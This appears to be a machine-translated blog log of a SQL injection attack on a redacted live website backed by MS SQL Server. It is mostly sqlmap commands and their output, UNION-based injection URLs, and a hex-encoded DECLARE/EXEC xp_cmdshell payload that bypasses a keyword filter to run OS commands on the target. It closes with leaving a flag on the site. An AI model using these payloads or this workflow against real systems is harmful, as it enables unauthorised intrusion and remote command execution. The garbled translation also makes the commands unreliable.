A teenager should be required to test a site that has an error injection point, you can read the database name, but Sqlmap execution –os-shell option will be inexplicable when it off;
Tested several times in steps, found that xp_cmdshell is on, but injected with Sqlmap but unable to execute commands with xp_cmdshell?
Just recently read "SQL Injection attack and defense", feel this is really a good goal to practice!
In order to simplify the test steps, the article is divided into 5 records;
0x1 Sqlmap Common sentence test
Test 1 Purpose: Execute cmd command
Test 1 results, the initial test can not be connected;
-----------------------------------------------------
C:\users\administrator>sqlmap-u "Http://www.****.com/index/searchresult. aspx? Keyname=1&keyword=1 "--level 5--risk 3--technique BST--batch--os-shell echo Packet" LOG "file --- Parameter: KeyWord (GET) type:boolean-based blind title:and boolean-based blind-where or HAVING clause Payload: keyname=1&keyword=1% ' and 1799=1799 and '% ' = ' --- [00:26:38][info] The back-end DBMS ismicrosoft SQL server< C10/>web server operating system:windows2003or XP Web application technology:asp.net,microsoft IIS 6.0, ASP. NET 2.0 .50727 back-end dbms:microsoft SQL Server2000 [00:26:38][critical] Unable to prompt for an interactive Operating system shell via the back-end DBMS because stacked queries SQL injection IsNot supported
Test 2 Purpose: Execute get database name;
Test 2 results: Get success, judge that a keyword was filtered.
-----------------------------------------------------
C:\users\administrator>sqlmap-u "Http://www.****.com/index/searchresult.aspx? Keyname=1&keyword=1 "--level 5--risk 3--technique BST--batch--dbs
echo Packet "LOG" file
---parameter:keyword (GET) type:boolean-based Blindtitle:and boolean-based blind-where or having Clausepayload:keynam e=1&keyword=1% ' and 1799=1799 and '% ' = '---Web server operating system:windows 2003 or Xpweb application Technology:a Sp.net, Microsoft IIS 6.0, ASP. 2.0.50727back-end dbms:microsoft SQL Server 2000available databases [7]:[*] master[*] Model[*] msdb[*] northwind[*] pubs[*] tempdb[*] W**er
0x2 manual testing of keyword filtering
Test 3 Purpose: Get the database name
Test 3 results: successful execution;
-----------------------------------------------------
Http://www.****.com/index/searchresult.aspx? keyname=1&keyword=1% ' UNION all SELECT 1,db_name (5), 3,4,5 from master. sysdatabases---
Test 4 Purpose: Check wooyundrops try to enter SQL statements manually using xp_cmdshell to execute commands
Test 4 Result: Unable to connect server, return 404 page;
-----------------------------------------------------
; EXEC Master. xp_cmdshell ' net user '---
Test 5 Purpose: Try to add the% symbol to the keyword, the OUTPUT keyword to determine which keyword is filtered;
Test 5 Result: Xp_cmdshell,sp_configure and no filter? However, a SQL statement error occurred while matching to "'. should be (') the single quote is parsed into the normal statement
-----------------------------------------------------
Http://www.****.com/index/searchresult.aspx? keyname=1&keyword=1% ' UNION all SELECT 1, ' Xp_shell ', 3,4,5---
Test the error reported by the target;
Server error in "/" application. there is a syntax error near the keyword ' and '. Description: An unhandled exception occurred during the execution of the current Web request. Check the stack trace information For more information about the error and the source of the error in your code. Exception Details: System.Exception: There is a syntax error near the keyword ' and '.
Workaround: Try to set hex bypass with declare;
Local testing:
-------------------
declare @a sysname [email protected]= exec Master.dbo.xp_cmdshell @a
Local test statement, where "0x770068006f0061006d006900" is decoded after "WhoAmI":
SELECT TOP 2[id] , [name] from [personnel].[ DBO]. [Management];d eclare @a sysname [email protected]=0x770068006f0061006d006900exec master.dbo.xp_cmdshell @a;
Local test results See tu1.jpg
Test Result: The target does not echo, but the command to write to the file is successful.
Http://www.****.com/index/searchresult.aspx? keyname=1&keyword=1% ';d eclare @a sysname Select @a=0x770068006f0061006d006900 exec master.dbo.xp_cmdshell @a;–-
Leave a flag;
SQL Server inject executes SQL statement instances using dynamic queries